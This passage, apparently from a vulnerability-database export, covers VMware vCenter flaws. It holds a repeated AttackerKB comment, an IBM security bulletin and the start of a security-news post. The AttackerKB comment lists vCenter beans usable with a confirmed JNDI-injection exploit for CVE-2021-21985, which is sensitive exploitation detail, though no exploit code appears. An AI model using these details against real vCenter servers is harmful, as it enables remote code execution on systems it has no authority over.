PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:39:16", "description": "## Summary\n\nMultiple vulnerabilities in VMware vCenter plugins affect IBM Cloud Pak System. IBM Cloud Pak System in response to the vulnerabilities in VMware vCenter, provides the new release of IBM Cloud Pak System V2.3.3.4, with a new vCenter Image. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-21985](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. By sending a specially-crafted request using port 443, an attacker could exploit this vulnerability to execute arbitrary commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21986](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21986>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by a flaw in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. By sending a specially-crafted request using port 443, an attacker could exploit this vulnerability to bypass authentication and perform actions allowed by the impacted plug-ins without authentication. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202403](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202403>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-21991](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21991>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper handling of session tokens. An attacker could exploit this vulnerability to escalate privileges to Administrator on the vSphere Client. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209752](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209752>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21992>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by improper XML entity parsing. A remote authenticated attacker could exploit this vulnerability to cause a denial of service on the vCenter Server host. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209751](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209751>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-21993](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21993>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to server-side request forgery, caused by improper validation of URLs in vCenter Server Content Library. By sending a specially-crafted POST request, a remote authenticated attacker could exploit this to obtain sensitive information. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209750](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209750>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-22006](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22006>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by improper handling of the URI by endpoints. An attacker could exploit this vulnerability to access restricted endpoints. \nCVSS Base score: 8.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209748](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209748>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-22008](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22008>) \n** DESCRIPTION: **VMware vCenter Server could allow a remote attacker to obtain sensitive information. By sending a specially crafted jsonrpc message, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209746](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209746>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-22009](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22009>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by an error in VAPI (vCenter API) service. A remote attacker could exploit this vulnerability to consume excessive memory resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209745](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209745>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22010](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22010>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by an error in VPXD (Virtual Provisioning X Daemon) service. A remote attacker could exploit this vulnerability to consume excessive memory resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209744](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209744>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22011](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22011>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by an unauthenticated API endpoint vulnerability. An attacker could exploit this vulnerability to manipulate VM network settings. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H) \n \n** CVEID: **[CVE-2021-22016](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22016>) \n** DESCRIPTION: **VMware vCenter Server is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209738](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209738>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-22017](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22017>) \n** DESCRIPTION: **Rhttproxy as used in VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by the improper implementation of URI normalization. An attacker could exploit this vulnerability to bypass proxy leading to internal endpoints being accessed. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209737](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209737>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System| V2.3.0.1, V.2.3.1.1, v.2.3.2.0 \nIBM Cloud Pak System| v2.3.3.0, v.2.3.3.1, v.2.3.3.2, v.2.3.3.3, v2.3.3.3 iFix 1 \n \n## Remediation/Fixes\n\nFor unsupported or end of life release recommendation is to upgrade to supported fixed release of the product.\n\nIBM Cloud Pak System, in response to the vulnerabilities above provides the new release of IBM Cloud Pak System V2.3.3.4, with new Windows vCenter Image update to vCenter 6.7 U3o. \n\nFor IBM Cloud Pak System V2.3.0.1, V.2.3.1.1, v.2.3.2.0, v2.3.3.0, v.2.3.3.1, v.2.3.3.2, v.2.3.3.3, v2.3.3.3 iFix 1\n\nupgrade to IBM Cloud Pak System v2.3.3.4 at [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.4&platform=Linux&function=all> \"Fix Central\" )\n\nIf you are not able to upgrade or for earlier releases, until you upgrade apply workaround as provided [here.](<https://www.ibm.com/support/pages/node/6537856> \"here\" )\n\nInformation on upgrading can be found here: [http://www.ibm.com/support/docview.wss?uid=ibm10887959.](<http://www.ibm.com/support/docview.wss?uid=ibm10887959>)\n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html> \"VMware vCenter Server updates address remote code execution and authentication vulnerabilities \\(CVE-2021-21985, CVE-2021-21986\\)\" )\n\n[VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html> \"VMware vCenter Server updates address multiple security vulnerabilities\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Oct 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU025\",\"label\":\"IBM Cloud and Cognitive Software\"},\"Product\":{\"code\":\"SSFQWQ\",\"label\":\"IBM Cloud Pak System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.3\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T21:11:34", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in VMware vCenter affect IBM Cloud Pak System", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986", "CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22006", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22016", "CVE-2021-22017"], "modified": "2022-05-06T21:11:34", "id": "CBB1F0F0AF16A09B88EDDD5E242727A3EF12C793CFCE5ED8C34772D7D40B12CB", "href": "https://www.ibm.com/support/pages/node/6507111", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is 